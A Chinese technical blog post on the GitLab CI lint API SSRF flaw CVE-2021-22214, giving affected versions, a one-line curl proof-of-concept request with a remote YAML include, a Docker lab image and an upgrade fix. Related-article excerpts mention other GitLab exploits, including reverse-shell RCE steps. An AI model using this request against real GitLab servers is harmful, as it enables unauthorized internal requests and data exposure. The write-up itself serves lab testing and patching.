[CVE-2021-22214]Gitlab SSRF 未授权访问漏洞

最新推荐文章于 2024-02-02 13:36:24 发布
最新推荐文章于 2024-02-02 13:36:24 发布
阅读量3.3k 收藏
点赞数
分类专栏: 漏洞分析 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42353842/article/details/124148153
版权

一、影响版本

13.10.5 > GitLab >= 10.5

13.11.5 > GitLab >= 13.11

13.12.2 > GitLab >= 13.12

二、漏洞POC

curl -s --show-error -H 'Content-Type: application/json' http://127.0.0.1:55001/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://*****.******.cn/*****/?test.yml"}'

注意.yml是必要的

三、漏洞靶场

docker pull vulfocus/gitlab-cve_2021_22214:latest

 

四、修复方式

升级Gitlab

一苇sec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-22205 GITLAB 授权 RCE 漏洞
qq_32445755的博客
04-17 644
简介 GitLab是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。由于GitLab存在授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用。 漏洞利用 上工具 python3 poc import sys import requests from bs4 import BeautifulSoup requests.packages.urllib3.disable_warnings() def .
Gitlab SSRF 漏洞复现 CVE-2021-22214
afei001
08-03 1187
GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。当对内部网络的webhook的请求被启用时,GitLab CE/EE中一个服务器端请求伪造漏洞SSRF(影响从10.5开始的所有版本)就有可能被经身份验证的攻击者利用,即使是在注册受限的GitLab实例上。...
gitlab SSRF(CVE-2021-22214
YouthBelief的博客
11-11 1762
gitlab SSRF CVE-2021-22214gitlab SSRF(CVE-2021-22214)0x01 漏洞描述0x02 影响范围0x03 漏洞复现curl检测脚本检测0x04 漏洞修复 gitlab SSRF(CVE-2021-22214) 0x01 漏洞描述 GitLab存在前台授权SSRF漏洞。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。 0x0
追洞计划 | Gitlab CI Lint API授权 SSRF漏洞(CVE-2021-22214)
Ms08067安全实验室
06-22 6063
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web安全攻防合伙人) GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来...
(CVE-2021-22214)Gitlab SSRF漏洞 漏洞复现
鸣蜩十四的博客
08-09 2558
简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。 漏洞描述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档,其include 操作支持remote选项,用于获取远端的yaml。因此在此处将
CVE-2021-22192:CVE-2021-22192靶场:授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
Gitlab SSRF(CVE-2021-22214)
最新发布
m0_65150886的博客
02-02 323
当13.10.5 > GitLab >= 10.5、13.11.5 > GitLab >= 13.11、13.12.2 > GitLab >= 13.12时,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。而根据其说明文档文档,其include操作支持remote选项,用于获取远端的yaml。GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。
CVE-2021-22214 Gitlab_SSRF
weixin_45945976的博客
12-15 2700
CVE-2021-22214 Gitlab_SSRF 漏洞复现: 目标地址:https://gitlab.xxx.xxx/users/sign_in POC curl -s --show-error -H 'Content-Type: application/json' https://gitlab.xxx.xxx/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://fbnw
【SOAR】策略实现及思考--Gitlab授权
weixin_40418457的博客
06-24 409
前言 近日,在对项目进行做信息收集的过程中,通过特别简单的一个策略得到了意外的收获:发现某项目的Gitlab的公开仓库,并在其中找到数据库账号密码等,并存在大量数据。 Gitlab相关配置问题 现在很多公司都会选择将自己的代码部署到私有化的Gitlab仓库中。而在使用的过程中,如果配置不当,则会有很大的信息泄漏风险。对于代码仓库的权限设置,仓库有三种权限:私有、内部、公开。 敏感代码仓库设置为公开可见。 很多员工在Gitlab配置自己的代码仓库时,会直接设置为公开可见的仓库。公开权限是指任何人包括登录
Gitlab 授权RCE(CVE-2021-22205)漏洞分析及排查
dayouzi的博客
08-11 845
GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。但漏洞版本中,GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行。
CVE漏洞复现-CVE-2021-22205 GitLab授权 RCE
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 1264
2021年4月15日,GitLab官方发布安全补丁更新修复了GitLab命令执行漏洞CVE-2021-22205)。由于GitLab中的ExifTool没有对传入的图像文件的扩展名进行正确处理,攻击者通过上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影响,CVSS评分为9.9。
gitlab 授权rce (CVE-2021-22205)
YouthBelief的博客
11-11 2712
gitlab 授权rce (CVE-2021-22205)gitlab 授权rce (CVE-2021-22205)0x01 漏洞描述0x02 影响范围0x03 漏洞复现查看帮助先用验证模式执行命令反弹shell0x04 漏洞修复 gitlab 授权rce (CVE-2021-22205) 0x01 漏洞描述 2021年4⽉15⽇,GitLab官⽅发布安全补丁更新修复了GitLab命令执⾏漏洞CVE-2021-22205)。由于GitLab中的ExifTool没有对传⼊的图像⽂件的扩展名进⾏正确处理
生命在于研究——CVE-2021-22214记录
易水哲的博客
09-28 399
GitLab存在前台授权SSRF漏洞授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。
Log4j2漏洞复现(CVE-2021-44228)
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
CVE-2021-22214
08-09
CVE-2021-22214是一个与GitLab相关的SSRF漏洞。该漏洞允许攻击者通过构造特定的请求,在GitLab中实现服务器端请求伪造。通过发送恶意的请求,攻击者可以执行授权的操作,可能导致敏感信息泄露或系统受到攻击。 该漏洞的影响范围包括受影响的GitLab版本。您提供的引用中包含了一些关于漏洞复现的POC(Proof of Concept)示例代码,用于验证漏洞存在性。这些示例代码展示了如何利用该漏洞进行攻击。 为了修复该漏洞,用户应及时更新受影响的GitLab版本到修复补丁发布的版本。此外,还可以采取其他安全措施,如限制对GitLab API的访问权限,以减少潜在的攻击风险。 请注意,漏洞利用和攻击是违法行为,请确保在合法授权和法律框架内进行任何安全研究和测试活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值